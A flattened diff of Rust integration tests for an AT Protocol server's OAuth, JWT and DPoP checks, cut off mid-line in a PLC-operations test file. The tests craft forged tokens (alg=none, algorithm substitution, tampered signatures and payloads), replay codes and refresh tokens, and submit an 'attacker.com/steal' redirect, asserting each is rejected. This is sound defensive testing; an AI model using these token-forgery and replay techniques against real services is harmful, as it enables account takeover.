90 + .unwrap() 91 + .split('&') 92 + .next() 93 + .unwrap(); 94 + let token_body: Value = http_client 95 + .post(format!("{}/oauth/token", url)) 96 + .form(&[ 97 + ("grant_type", "authorization_code"), 98 + ("code", code), 99 + ("redirect_uri", redirect_uri), 100 + ("code_verifier", &code_verifier), 101 + ("client_id", &client_id), 102 + ]) 103 + .send() 104 + .await 105 + .unwrap() 106 + .json() 107 + .await 108 + .unwrap(); 109 + ( 110 + token_body["access_token"].as_str().unwrap().to_string(), 111 + token_body["refresh_token"].as_str().unwrap().to_string(), 112 + client_id, 113 + ) 114 } 115 116 #[tokio::test] ··· 122 assert_eq!(parts.len(), 3); 123 let forged_sig = URL_SAFE_NO_PAD.encode(&[0u8; 32]); 124 let forged_token = format!("{}.{}.{}", parts[0], parts[1], forged_sig); 125 + assert_eq!( 126 + http_client 127 + .get(format!("{}/xrpc/com.atproto.server.getSession", url)) 128 + .bearer_auth(&forged_token) 129 + .send() 130 + .await 131 + .unwrap() 132 + .status(), 133 + StatusCode::UNAUTHORIZED, 134 + "Forged signature should be rejected" 135 + ); 136 let payload_bytes = URL_SAFE_NO_PAD.decode(parts[1]).unwrap(); 137 let mut payload: Value = serde_json::from_slice(&payload_bytes).unwrap(); 138 payload["sub"] = json!("did:plc:attacker"); 139 let modified_payload = URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap()); 140 let modified_token = format!("{}.{}.{}", parts[0], modified_payload, parts[2]); 141 + assert_eq!( 142 + http_client 143 + .get(format!("{}/xrpc/com.atproto.server.getSession", url)) 144 + .bearer_auth(&modified_token) 145 + .send() 146 + .await 147 + .unwrap() 148 + .status(), 149 + StatusCode::UNAUTHORIZED, 150 + "Modified payload should be rejected" 151 + ); 152 let none_header = json!({ "alg": "none", "typ": "at+jwt" }); 153 let none_payload = json!({ "iss": "https://test.pds", "sub": "did:plc:attacker", "aud": "https://test.pds", 154 "iat": Utc::now().timestamp(), "exp": Utc::now().timestamp() + 3600, "jti": "fake", "scope": "atproto" }); 155 + let none_token = format!( 156 + "{}.{}.", 157 + URL_SAFE_NO_PAD.encode(serde_json::to_string(&none_header).unwrap()), 158 + URL_SAFE_NO_PAD.encode(serde_json::to_string(&none_payload).unwrap()) 159 + ); 160 + assert_eq!( 161 + http_client 162 + .get(format!("{}/xrpc/com.atproto.server.getSession", url)) 163 + .bearer_auth(&none_token) 164 + .send() 165 + .await 166 + .unwrap() 167 + .status(), 168 + StatusCode::UNAUTHORIZED, 169 + "alg=none should be rejected" 170 + ); 171 let rs256_header = json!({ "alg": "RS256", "typ": "at+jwt" }); 172 + let rs256_token = format!( 173 + "{}.{}.{}", 174 + URL_SAFE_NO_PAD.encode(serde_json::to_string(&rs256_header).unwrap()), 175 + URL_SAFE_NO_PAD.encode(serde_json::to_string(&none_payload).unwrap()), 176 + URL_SAFE_NO_PAD.encode(&[1u8; 64]) 177 + ); 178 + assert_eq!( 179 + http_client 180 + .get(format!("{}/xrpc/com.atproto.server.getSession", url)) 181 + .bearer_auth(&rs256_token) 182 + .send() 183 + .await 184 + .unwrap() 185 + .status(), 186 + StatusCode::UNAUTHORIZED, 187 + "Algorithm substitution should be rejected" 188 + ); 189 let expired_payload = json!({ "iss": "https://test.pds", "sub": "did:plc:test", "aud": "https://test.pds", 190 "iat": Utc::now().timestamp() - 7200, "exp": Utc::now().timestamp() - 3600, "jti": "expired" }); 191 + let expired_token = format!( 192 + "{}.{}.{}", 193 + URL_SAFE_NO_PAD 194 + .encode(serde_json::to_string(&json!({"alg":"HS256","typ":"at+jwt"})).unwrap()), 195 + URL_SAFE_NO_PAD.encode(serde_json::to_string(&expired_payload).unwrap()), 196 + URL_SAFE_NO_PAD.encode(&[1u8; 32]) 197 + ); 198 + assert_eq!( 199 + http_client 200 + .get(format!("{}/xrpc/com.atproto.server.getSession", url)) 201 + .bearer_auth(&expired_token) 202 + .send() 203 + .await 204 + .unwrap() 205 + .status(), 206 + StatusCode::UNAUTHORIZED, 207 + "Expired token should be rejected" 208 + ); 209 } 210 211 #[tokio::test] ··· 215 let redirect_uri = "https://example.com/pkce-callback"; 216 let mock_client = setup_mock_client_metadata(redirect_uri).await; 217 let client_id = mock_client.uri(); 218 + let res = http_client 219 + .post(format!("{}/oauth/par", url)) 220 + .form(&[ 221 + ("response_type", "code"), 222 + ("client_id", &client_id), 223 + ("redirect_uri", redirect_uri), 224 + ("code_challenge", "plain-text-challenge"), 225 + ("code_challenge_method", "plain"), 226 + ]) 227 + .send() 228 + .await 229 + .unwrap(); 230 + assert_eq!( 231 + res.status(), 232 + StatusCode::BAD_REQUEST, 233 + "PKCE plain method should be rejected" 234 + ); 235 let body: Value = res.json().await.unwrap(); 236 + assert!( 237 + body["error_description"] 238 + .as_str() 239 + .unwrap() 240 + .to_lowercase() 241 + .contains("s256") 242 + ); 243 + let res = http_client 244 + .post(format!("{}/oauth/par", url)) 245 + .form(&[ 246 + ("response_type", "code"), 247 + ("client_id", &client_id), 248 + ("redirect_uri", redirect_uri), 249 + ]) 250 + .send() 251 + .await 252 + .unwrap(); 253 + assert_eq!( 254 + res.status(), 255 + StatusCode::BAD_REQUEST, 256 + "Missing PKCE challenge should be rejected" 257 + ); 258 let ts = Utc::now().timestamp_millis(); 259 let handle = format!("pkce-attack-{}", ts); 260 let create_res = http_client.post(format!("{}/xrpc/com.atproto.server.createAccount", url)) ··· 264 verify_new_account(&http_client, account["did"].as_str().unwrap()).await; 265 let (_, code_challenge) = generate_pkce(); 266 let (attacker_verifier, _) = generate_pkce(); 267 + let par_body: Value = http_client 268 + .post(format!("{}/oauth/par", url)) 269 + .form(&[ 270 + ("response_type", "code"), 271 + ("client_id", &client_id), 272 + ("redirect_uri", redirect_uri), 273 + ("code_challenge", &code_challenge), 274 + ("code_challenge_method", "S256"), 275 + ]) 276 + .send() 277 + .await 278 + .unwrap() 279 + .json() 280 + .await 281 + .unwrap(); 282 let request_uri = par_body["request_uri"].as_str().unwrap(); 283 + let auth_res = http_client.post(format!("{}/oauth/authorize", url)) 284 + .header("Content-Type", "application/json") 285 + .header("Accept", "application/json") 286 + .json(&json!({"request_uri": request_uri, "username": &handle, "password": "pkce-password", "remember_device": false})) 287 .send().await.unwrap(); 288 + assert_eq!(auth_res.status(), StatusCode::OK); 289 + let auth_body: Value = auth_res.json().await.unwrap(); 290 + let mut location = auth_body["redirect_uri"].as_str().unwrap().to_string(); 291 + if location.contains("/oauth/consent") { 292 + let consent_res = http_client.post(format!("{}/oauth/authorize/consent", url)) 293 + .header("Content-Type", "application/json") 294 + .json(&json!({"request_uri": request_uri, "approved_scopes": ["atproto"], "remember": false})) 295 + .send().await.unwrap(); 296 + let consent_body: Value = consent_res.json().await.unwrap(); 297 + location = consent_body["redirect_uri"].as_str().unwrap().to_string(); 298 + } 299 + let code = location 300 + .split("code=") 301 + .nth(1) 302 + .unwrap() 303 + .split('&') 304 + .next() 305 + .unwrap(); 306 + let token_res = http_client 307 + .post(format!("{}/oauth/token", url)) 308 + .form(&[ 309 + ("grant_type", "authorization_code"), 310 + ("code", code), 311 + ("redirect_uri", redirect_uri), 312 + ("code_verifier", &attacker_verifier), 313 + ("client_id", &client_id), 314 + ]) 315 + .send() 316 + .await 317 + .unwrap(); 318 + assert_eq!( 319 + token_res.status(), 320 + StatusCode::BAD_REQUEST, 321 + "Wrong PKCE verifier should be rejected" 322 + ); 323 } 324 325 #[tokio::test] ··· 337 let mock_client = setup_mock_client_metadata(redirect_uri).await; 338 let client_id = mock_client.uri(); 339 let (code_verifier, code_challenge) = generate_pkce(); 340 + let par_body: Value = http_client 341 + .post(format!("{}/oauth/par", url)) 342 + .form(&[ 343 + ("response_type", "code"), 344 + ("client_id", &client_id), 345 + ("redirect_uri", redirect_uri), 346 + ("code_challenge", &code_challenge), 347 + ("code_challenge_method", "S256"), 348 + ]) 349 + .send() 350 + .await 351 + .unwrap() 352 + .json() 353 + .await 354 + .unwrap(); 355 let request_uri = par_body["request_uri"].as_str().unwrap(); 356 + let auth_res = http_client.post(format!("{}/oauth/authorize", url)) 357 + .header("Content-Type", "application/json") 358 + .header("Accept", "application/json") 359 + .json(&json!({"request_uri": request_uri, "username": &handle, "password": "replay-password", "remember_device": false})) 360 .send().await.unwrap(); 361 + assert_eq!(auth_res.status(), StatusCode::OK); 362 + let auth_body: Value = auth_res.json().await.unwrap(); 363 + let mut location = auth_body["redirect_uri"].as_str().unwrap().to_string(); 364 + if location.contains("/oauth/consent") { 365 + let consent_res = http_client.post(format!("{}/oauth/authorize/consent", url)) 366 + .header("Content-Type", "application/json") 367 + .json(&json!({"request_uri": request_uri, "approved_scopes": ["atproto"], "remember": false})) 368 + .send().await.unwrap(); 369 + let consent_body: Value = consent_res.json().await.unwrap(); 370 + location = consent_body["redirect_uri"].as_str().unwrap().to_string(); 371 + } 372 + let code = location 373 + .split("code=") 374 + .nth(1) 375 + .unwrap() 376 + .split('&') 377 + .next() 378 + .unwrap() 379 + .to_string(); 380 + let first = http_client 381 + .post(format!("{}/oauth/token", url)) 382 + .form(&[ 383 + ("grant_type", "authorization_code"), 384 + ("code", &code), 385 + ("redirect_uri", redirect_uri), 386 + ("code_verifier", &code_verifier), 387 + ("client_id", &client_id), 388 + ]) 389 + .send() 390 + .await 391 + .unwrap(); 392 assert_eq!(first.status(), StatusCode::OK, "First use should succeed"); 393 let first_body: Value = first.json().await.unwrap(); 394 + let replay = http_client 395 + .post(format!("{}/oauth/token", url)) 396 + .form(&[ 397 + ("grant_type", "authorization_code"), 398 + ("code", &code), 399 + ("redirect_uri", redirect_uri), 400 + ("code_verifier", &code_verifier), 401 + ("client_id", &client_id), 402 + ]) 403 + .send() 404 + .await 405 + .unwrap(); 406 + assert_eq!( 407 + replay.status(), 408 + StatusCode::BAD_REQUEST, 409 + "Auth code replay should fail" 410 + ); 411 let stolen_rt = first_body["refresh_token"].as_str().unwrap().to_string(); 412 + let first_refresh: Value = http_client 413 + .post(format!("{}/oauth/token", url)) 414 + .form(&[ 415 + ("grant_type", "refresh_token"), 416 + ("refresh_token", &stolen_rt), 417 + ("client_id", &client_id), 418 + ]) 419 + .send() 420 + .await 421 + .unwrap() 422 + .json() 423 + .await 424 + .unwrap(); 425 + assert!( 426 + first_refresh["access_token"].is_string(), 427 + "First refresh should succeed" 428 + ); 429 let new_rt = first_refresh["refresh_token"].as_str().unwrap(); 430 + let rt_replay = http_client 431 + .post(format!("{}/oauth/token", url)) 432 + .form(&[ 433 + ("grant_type", "refresh_token"), 434 + ("refresh_token", &stolen_rt), 435 + ("client_id", &client_id), 436 + ]) 437 + .send() 438 + .await 439 + .unwrap(); 440 + assert_eq!( 441 + rt_replay.status(), 442 + StatusCode::BAD_REQUEST, 443 + "Refresh token replay should fail" 444 + ); 445 let body: Value = rt_replay.json().await.unwrap(); 446 + assert!( 447 + body["error_description"] 448 + .as_str() 449 + .unwrap() 450 + .to_lowercase() 451 + .contains("reuse") 452 + ); 453 + let family_revoked = http_client 454 + .post(format!("{}/oauth/token", url)) 455 + .form(&[ 456 + ("grant_type", "refresh_token"), 457 + ("refresh_token", new_rt), 458 + ("client_id", &client_id), 459 + ]) 460 + .send() 461 + .await 462 + .unwrap(); 463 + assert_eq!( 464 + family_revoked.status(), 465 + StatusCode::BAD_REQUEST, 466 + "Token family should be revoked" 467 + ); 468 } 469 470 #[tokio::test] ··· 475 let mock_client = setup_mock_client_metadata(registered_redirect).await; 476 let client_id = mock_client.uri(); 477 let (_, code_challenge) = generate_pkce(); 478 + let res = http_client 479 + .post(format!("{}/oauth/par", url)) 480 + .form(&[ 481 + ("response_type", "code"), 482 + ("client_id", &client_id), 483 + ("redirect_uri", "https://attacker.com/steal"), 484 + ("code_challenge", &code_challenge), 485 + ("code_challenge_method", "S256"), 486 + ]) 487 + .send() 488 + .await 489 + .unwrap(); 490 + assert_eq!( 491 + res.status(), 492 + StatusCode::BAD_REQUEST, 493 + "Unregistered redirect_uri should be rejected" 494 + ); 495 let ts = Utc::now().timestamp_millis(); 496 let handle = format!("deact-{}", ts); 497 let create_res = http_client.post(format!("{}/xrpc/com.atproto.server.createAccount", url)) ··· 499 .send().await.unwrap(); 500 let account: Value = create_res.json().await.unwrap(); 501 let access_jwt = verify_new_account(&http_client, account["did"].as_str().unwrap()).await; 502 + http_client 503 + .post(format!("{}/xrpc/com.atproto.server.deactivateAccount", url)) 504 + .bearer_auth(&access_jwt) 505 + .json(&json!({})) 506 + .send() 507 + .await 508 + .unwrap(); 509 + let deact_par: Value = http_client 510 + .post(format!("{}/oauth/par", url)) 511 + .form(&[ 512 + ("response_type", "code"), 513 + ("client_id", &client_id), 514 + ("redirect_uri", registered_redirect), 515 + ("code_challenge", &code_challenge), 516 + ("code_challenge_method", "S256"), 517 + ]) 518 + .send() 519 + .await 520 + .unwrap() 521 + .json() 522 + .await 523 + .unwrap(); 524 let auth_res = http_client.post(format!("{}/oauth/authorize", url)) 525 + .header("Content-Type", "application/json") 526 .header("Accept", "application/json") 527 + .json(&json!({"request_uri": deact_par["request_uri"].as_str().unwrap(), "username": &handle, "password": "deact-password", "remember_device": false})) 528 .send().await.unwrap(); 529 + assert_eq!( 530 + auth_res.status(), 531 + StatusCode::FORBIDDEN, 532 + "Deactivated account should be blocked" 533 + ); 534 let redirect_uri_a = "https://app-a.com/callback"; 535 let mock_a = setup_mock_client_metadata(redirect_uri_a).await; 536 let client_id_a = mock_a.uri(); ··· 544 let account2: Value = create_res2.json().await.unwrap(); 545 verify_new_account(&http_client, account2["did"].as_str().unwrap()).await; 546 let (code_verifier2, code_challenge2) = generate_pkce(); 547 + let par_a: Value = http_client 548 + .post(format!("{}/oauth/par", url)) 549 + .form(&[ 550 + ("response_type", "code"), 551 + ("client_id", &client_id_a), 552 + ("redirect_uri", redirect_uri_a), 553 + ("code_challenge", &code_challenge2), 554 + ("code_challenge_method", "S256"), 555 + ]) 556 + .send() 557 + .await 558 + .unwrap() 559 + .json() 560 + .await 561 + .unwrap(); 562 + let request_uri_a = par_a["request_uri"].as_str().unwrap(); 563 + let auth_a = http_client.post(format!("{}/oauth/authorize", url)) 564 + .header("Content-Type", "application/json") 565 + .header("Accept", "application/json") 566 + .json(&json!({"request_uri": request_uri_a, "username": &handle2, "password": "cross-password", "remember_device": false})) 567 .send().await.unwrap(); 568 + assert_eq!(auth_a.status(), StatusCode::OK); 569 + let auth_body_a: Value = auth_a.json().await.unwrap(); 570 + let mut loc_a = auth_body_a["redirect_uri"].as_str().unwrap().to_string(); 571 + if loc_a.contains("/oauth/consent") { 572 + let consent_res = http_client.post(format!("{}/oauth/authorize/consent", url)) 573 + .header("Content-Type", "application/json") 574 + .json(&json!({"request_uri": request_uri_a, "approved_scopes": ["atproto"], "remember": false})) 575 + .send().await.unwrap(); 576 + let consent_body: Value = consent_res.json().await.unwrap(); 577 + loc_a = consent_body["redirect_uri"].as_str().unwrap().to_string(); 578 + } 579 + let code_a = loc_a 580 + .split("code=") 581 + .nth(1) 582 + .unwrap() 583 + .split('&') 584 + .next() 585 + .unwrap(); 586 + let cross_client = http_client 587 + .post(format!("{}/oauth/token", url)) 588 + .form(&[ 589 + ("grant_type", "authorization_code"), 590 + ("code", code_a), 591 + ("redirect_uri", redirect_uri_a), 592 + ("code_verifier", &code_verifier2), 593 + ("client_id", &client_id_b), 594 + ]) 595 + .send() 596 + .await 597 + .unwrap(); 598 + assert_eq!( 599 + cross_client.status(), 600 + StatusCode::BAD_REQUEST, 601 + "Cross-client code exchange must be rejected" 602 + ); 603 } 604 605 #[tokio::test] 606 async fn test_malformed_tokens_and_headers() { 607 let url = base_url().await; 608 let http_client = client(); 609 + let malformed = vec![ 610 + "", 611 + "not-a-token", 612 + "one.two", 613 + "one.two.three.four", 614 + "....", 615 + "eyJhbGciOiJIUzI1NiJ9", 616 + "eyJhbGciOiJIUzI1NiJ9.", 617 + "eyJhbGciOiJIUzI1NiJ9..", 618 + ".eyJzdWIiOiJ0ZXN0In0.", 619 + "!!invalid!!.eyJ9.sig", 620 + ]; 621 for token in &malformed { 622 + assert_eq!( 623 + http_client 624 + .get(format!("{}/xrpc/com.atproto.server.getSession", url)) 625 + .bearer_auth(token) 626 + .send() 627 + .await 628 + .unwrap() 629 + .status(), 630 + StatusCode::UNAUTHORIZED 631 + ); 632 } 633 let wrong_types = vec!["JWT", "jwt", "at+JWT", ""]; 634 for typ in wrong_types { 635 let header = json!({ "alg": "HS256", "typ": typ }); 636 let payload = json!({ "iss": "x", "sub": "did:plc:x", "aud": "x", "iat": Utc::now().timestamp(), "exp": Utc::now().timestamp() + 3600, "jti": "x" }); 637 + let token = format!( 638 + "{}.{}.{}", 639 + URL_SAFE_NO_PAD.encode(serde_json::to_string(&header).unwrap()), 640 + URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap()), 641 + URL_SAFE_NO_PAD.encode(&[1u8; 32]) 642 + ); 643 + assert_eq!( 644 + http_client 645 + .get(format!("{}/xrpc/com.atproto.server.getSession", url)) 646 + .bearer_auth(&token) 647 + .send() 648 + .await 649 + .unwrap() 650 + .status(), 651 + StatusCode::UNAUTHORIZED, 652 + "typ='{}' should be rejected", 653 + typ 654 + ); 655 } 656 let (access_token, _, _) = get_oauth_tokens(&http_client, url).await; 657 + let invalid_formats = vec![ 658 + format!("Basic {}", access_token), 659 + format!("Digest {}", access_token), 660 + access_token.clone(), 661 + format!("Bearer{}", access_token), 662 + ]; 663 for auth in &invalid_formats { 664 + assert_eq!( 665 + http_client 666 + .get(format!("{}/xrpc/com.atproto.server.getSession", url)) 667 + .header("Authorization", auth) 668 + .send() 669 + .await 670 + .unwrap() 671 + .status(), 672 + StatusCode::UNAUTHORIZED 673 + ); 674 } 675 + assert_eq!( 676 + http_client 677 + .get(format!("{}/xrpc/com.atproto.server.getSession", url)) 678 + .send() 679 + .await 680 + .unwrap() 681 + .status(), 682 + StatusCode::UNAUTHORIZED 683 + ); 684 + assert_eq!( 685 + http_client 686 + .get(format!("{}/xrpc/com.atproto.server.getSession", url)) 687 + .header("Authorization", "") 688 + .send() 689 + .await 690 + .unwrap() 691 + .status(), 692 + StatusCode::UNAUTHORIZED 693 + ); 694 + let grants = vec![ 695 + "client_credentials", 696 + "password", 697 + "implicit", 698 + "", 699 + "AUTHORIZATION_CODE", 700 + ]; 701 for grant in grants { 702 + assert_eq!( 703 + http_client 704 + .post(format!("{}/oauth/token", url)) 705 + .form(&[("grant_type", grant), ("client_id", "https://example.com")]) 706 + .send() 707 + .await 708 + .unwrap() 709 + .status(), 710 + StatusCode::BAD_REQUEST, 711 + "Grant '{}' should be rejected", 712 + grant 713 + ); 714 } 715 } 716 ··· 719 let url = base_url().await; 720 let http_client = client(); 721 let (access_token, refresh_token, _) = get_oauth_tokens(&http_client, url).await; 722 + assert_eq!( 723 + http_client 724 + .post(format!("{}/oauth/revoke", url)) 725 + .form(&[("token", &refresh_token)]) 726 + .send() 727 + .await 728 + .unwrap() 729 + .status(), 730 + StatusCode::OK 731 + ); 732 + let introspect: Value = http_client 733 + .post(format!("{}/oauth/introspect", url)) 734 + .form(&[("token", &access_token)]) 735 + .send() 736 + .await 737 + .unwrap() 738 + .json() 739 + .await 740 + .unwrap(); 741 + assert_eq!( 742 + introspect["active"], false, 743 + "Revoked token should be inactive" 744 + ); 745 } 746 747 + fn create_dpop_proof( 748 + method: &str, 749 + uri: &str, 750 + _nonce: Option<&str>, 751 + ath: Option<&str>, 752 + iat_offset: i64, 753 + ) -> String { 754 use p256::ecdsa::{Signature, SigningKey, signature::Signer}; 755 use p256::elliptic_curve::sec1::ToEncodedPoint; 756 let signing_key = SigningKey::random(&mut rand::thread_rng()); ··· 760 let header = json!({ "typ": "dpop+jwt", "alg": "ES256", "jwk": { "kty": "EC", "crv": "P-256", "x": x, "y": y } }); 761 let mut payload = json!({ "jti": format!("unique-{}", Utc::now().timestamp_nanos_opt().unwrap_or(0)), 762 "htm": method, "htu": uri, "iat": Utc::now().timestamp() + iat_offset }); 763 + if let Some(a) = ath { 764 + payload["ath"] = json!(a); 765 + } 766 let header_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&header).unwrap()); 767 let payload_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap()); 768 let signing_input = format!("{}.{}", header_b64, payload_b64); 769 let signature: Signature = signing_key.sign(signing_input.as_bytes()); 770 + format!( 771 + "{}.{}", 772 + signing_input, 773 + URL_SAFE_NO_PAD.encode(signature.to_bytes()) 774 + ) 775 } 776 777 #[test] ··· 783 let nonce = v1.generate_nonce(); 784 assert!(!nonce.is_empty()); 785 assert!(v1.validate_nonce(&nonce).is_ok(), "Valid nonce should pass"); 786 + assert!( 787 + v2.validate_nonce(&nonce).is_err(), 788 + "Nonce from different secret should fail" 789 + ); 790 let nonce_bytes = URL_SAFE_NO_PAD.decode(&nonce).unwrap(); 791 let mut tampered = nonce_bytes.clone(); 792 + if !tampered.is_empty() { 793 + tampered[0] ^= 0xFF; 794 + } 795 + assert!( 796 + v1.validate_nonce(&URL_SAFE_NO_PAD.encode(&tampered)) 797 + .is_err(), 798 + "Tampered nonce should fail" 799 + ); 800 assert!(v1.validate_nonce("invalid").is_err()); 801 assert!(v1.validate_nonce("").is_err()); 802 assert!(v1.validate_nonce("!!!not-base64!!!").is_err()); ··· 806 fn test_dpop_proof_validation() { 807 let secret = b"test-dpop-secret-32-bytes-long!!"; 808 let verifier = DPoPVerifier::new(secret); 809 + assert!( 810 + verifier 811 + .verify_proof("not.enough", "POST", "https://example.com", None) 812 + .is_err() 813 + ); 814 + assert!( 815 + verifier 816 + .verify_proof("invalid", "POST", "https://example.com", None) 817 + .is_err() 818 + ); 819 let proof = create_dpop_proof("POST", "https://example.com/token", None, None, 0); 820 + assert!( 821 + verifier 822 + .verify_proof(&proof, "GET", "https://example.com/token", None) 823 + .is_err(), 824 + "Method mismatch" 825 + ); 826 + assert!( 827 + verifier 828 + .verify_proof(&proof, "POST", "https://other.com/token", None) 829 + .is_err(), 830 + "URI mismatch" 831 + ); 832 + assert!( 833 + verifier 834 + .verify_proof(&proof, "POST", "https://example.com/token?foo=bar", None) 835 + .is_ok(), 836 + "Query params should be ignored" 837 + ); 838 let old_proof = create_dpop_proof("POST", "https://example.com/token", None, None, -600); 839 + assert!( 840 + verifier 841 + .verify_proof(&old_proof, "POST", "https://example.com/token", None) 842 + .is_err(), 843 + "iat too old" 844 + ); 845 let future_proof = create_dpop_proof("POST", "https://example.com/token", None, None, 600); 846 + assert!( 847 + verifier 848 + .verify_proof(&future_proof, "POST", "https://example.com/token", None) 849 + .is_err(), 850 + "iat in future" 851 + ); 852 + let ath_proof = create_dpop_proof( 853 + "GET", 854 + "https://example.com/resource", 855 + None, 856 + Some("wrong"), 857 + 0, 858 + ); 859 + assert!( 860 + verifier 861 + .verify_proof( 862 + &ath_proof, 863 + "GET", 864 + "https://example.com/resource", 865 + Some("correct") 866 + ) 867 + .is_err(), 868 + "ath mismatch" 869 + ); 870 let no_ath_proof = create_dpop_proof("GET", "https://example.com/resource", None, None, 0); 871 + assert!( 872 + verifier 873 + .verify_proof( 874 + &no_ath_proof, 875 + "GET", 876 + "https://example.com/resource", 877 + Some("expected") 878 + ) 879 + .is_err(), 880 + "Missing ath" 881 + ); 882 } 883 884 #[test] ··· 899 let payload_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap()); 900 let signing_input = format!("{}.{}", header_b64, payload_b64); 901 let signature: Signature = signing_key.sign(signing_input.as_bytes()); 902 + let mismatched = format!( 903 + "{}.{}", 904 + signing_input, 905 + URL_SAFE_NO_PAD.encode(signature.to_bytes()) 906 + ); 907 + assert!( 908 + verifier 909 + .verify_proof(&mismatched, "POST", "https://example.com/token", None) 910 + .is_err(), 911 + "Mismatched key should fail" 912 + ); 913 let point = signing_key.verifying_key().to_encoded_point(false); 914 let good_header = json!({ "typ": "dpop+jwt", "alg": "ES256", "jwk": { "kty": "EC", "crv": "P-256", 915 "x": URL_SAFE_NO_PAD.encode(point.x().unwrap()), "y": URL_SAFE_NO_PAD.encode(point.y().unwrap()) } }); ··· 919 let mut sig_bytes = good_sig.to_bytes().to_vec(); 920 sig_bytes[0] ^= 0xFF; 921 let tampered = format!("{}.{}", good_input, URL_SAFE_NO_PAD.encode(&sig_bytes)); 922 + assert!( 923 + verifier 924 + .verify_proof(&tampered, "POST", "https://example.com/token", None) 925 + .is_err(), 926 + "Tampered sig should fail" 927 + ); 928 } 929 930 #[test] 931 fn test_jwk_thumbprint() { 932 + let jwk = DPoPJwk { 933 + kty: "EC".to_string(), 934 + crv: Some("P-256".to_string()), 935 x: Some("WbbXrPhtCg66wuF0NLhzXxF5PFzNZ7wNJm9M_1pCcXY".to_string()), 936 + y: Some("DubR6_2kU1H5EYhbcNpYZGy1EY6GEKKxv6PYx8VW0rA".to_string()), 937 + }; 938 let tp1 = compute_jwk_thumbprint(&jwk).unwrap(); 939 let tp2 = compute_jwk_thumbprint(&jwk).unwrap(); 940 assert_eq!(tp1, tp2, "Thumbprint should be deterministic"); 941 assert!(!tp1.is_empty()); 942 + assert!( 943 + compute_jwk_thumbprint(&DPoPJwk { 944 + kty: "EC".to_string(), 945 + crv: Some("secp256k1".to_string()), 946 + x: Some("x".to_string()), 947 + y: Some("y".to_string()) 948 + }) 949 + .is_ok() 950 + ); 951 + assert!( 952 + compute_jwk_thumbprint(&DPoPJwk { 953 + kty: "OKP".to_string(), 954 + crv: Some("Ed25519".to_string()), 955 + x: Some("x".to_string()), 956 + y: None 957 + }) 958 + .is_ok() 959 + ); 960 + assert!( 961 + compute_jwk_thumbprint(&DPoPJwk { 962 + kty: "EC".to_string(), 963 + crv: None, 964 + x: Some("x".to_string()), 965 + y: Some("y".to_string()) 966 + }) 967 + .is_err() 968 + ); 969 + assert!( 970 + compute_jwk_thumbprint(&DPoPJwk { 971 + kty: "EC".to_string(), 972 + crv: Some("P-256".to_string()), 973 + x: None, 974 + y: Some("y".to_string()) 975 + }) 976 + .is_err() 977 + ); 978 + assert!( 979 + compute_jwk_thumbprint(&DPoPJwk { 980 + kty: "EC".to_string(), 981 + crv: Some("P-256".to_string()), 982 + x: Some("x".to_string()), 983 + y: None 984 + }) 985 + .is_err() 986 + ); 987 + assert!( 988 + compute_jwk_thumbprint(&DPoPJwk { 989 + kty: "RSA".to_string(), 990 + crv: None, 991 + x: None, 992 + y: None 993 + }) 994 + .is_err() 995 + ); 996 } 997 998 #[test] ··· 1001 use p256::elliptic_curve::sec1::ToEncodedPoint; 1002 let secret = b"test-dpop-secret-32-bytes-long!!"; 1003 let verifier = DPoPVerifier::new(secret); 1004 + let test_cases = vec![ 1005 + (-600, true), 1006 + (-301, true), 1007 + (-299, false), 1008 + (0, false), 1009 + (299, false), 1010 + (301, true), 1011 + (600, true), 1012 + ]; 1013 for (offset, should_fail) in test_cases { 1014 let signing_key = SigningKey::random(&mut rand::thread_rng()); 1015 let point = signing_key.verifying_key().to_encoded_point(false); ··· 1022 let payload_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap()); 1023 let signing_input = format!("{}.{}", header_b64, payload_b64); 1024 let signature: Signature = signing_key.sign(signing_input.as_bytes()); 1025 + let proof = format!( 1026 + "{}.{}", 1027 + signing_input, 1028 + URL_SAFE_NO_PAD.encode(signature.to_bytes()) 1029 + ); 1030 let result = verifier.verify_proof(&proof, "POST", "https://example.com/token", None); 1031 + if should_fail { 1032 + assert!(result.is_err(), "offset {} should fail", offset); 1033 + } else { 1034 + assert!(result.is_ok(), "offset {} should pass", offset); 1035 + } 1036 } 1037 } 1038 ··· 1053 let payload_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap()); 1054 let signing_input = format!("{}.{}", header_b64, payload_b64); 1055 let signature: Signature = signing_key.sign(signing_input.as_bytes()); 1056 + let proof = format!( 1057 + "{}.{}", 1058 + signing_input, 1059 + URL_SAFE_NO_PAD.encode(signature.to_bytes()) 1060 + ); 1061 + assert!( 1062 + verifier 1063 + .verify_proof(&proof, "POST", "https://example.com/token", None) 1064 + .is_ok(), 1065 + "HTTP method should be case-insensitive" 1066 + ); 1067 }
+111 -25
tests/plc_operations.rs
··· 7 #[tokio::test] 8 async fn test_plc_operation_auth() { 9 let client = client(); 10 - let res = client.post(format!("{}/xrpc/com.atproto.identity.requestPlcOperationSignature", base_url().await)) 11 - .send().await.unwrap(); 12 assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 13 - let res = client.post(format!("{}/xrpc/com.atproto.identity.signPlcOperation", base_url().await)) 14 - .json(&json!({})).send().await.unwrap(); 15 assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 16 - let res = client.post(format!("{}/xrpc/com.atproto.identity.submitPlcOperation", base_url().await)) 17 - .json(&json!({ "operation": {} })).send().await.unwrap(); 18 assert_eq!(res.status(), StatusCode::UNAUTHORIZED); 19 let (token, _) = create_account_and_login(&client).await; 20 - let res = client.post(format!("{}/xrpc/com.atproto.identity.requestPlcOperationSignature", base_url().await)) 21 - .bearer_auth(&token).send().await.unwrap(); 22 assert_eq!(res.status(), StatusCode::OK); 23 } 24 ··· 26 async fn test_sign_plc_operation_validation() { 27 let client = client(); 28 let (token, _) = create_account_and_login(&client).await; 29 - let res = client.post(format!("{}/xrpc/com.atproto.identity.signPlcOperation", base_url().await)) 30 - .bearer_auth(&token).json(&json!({})).send().await.unwrap(); 31 assert_eq!(res.status(), StatusCode::BAD_REQUEST); 32 let body: serde_json::Value = res.json().await.unwrap(); 33 assert_eq!(body["error"], "InvalidRequest"); 34 - let res = client.post(format!("{}/xrpc/com.atproto.identity.signPlcOperation", base_url().await)) 35 - 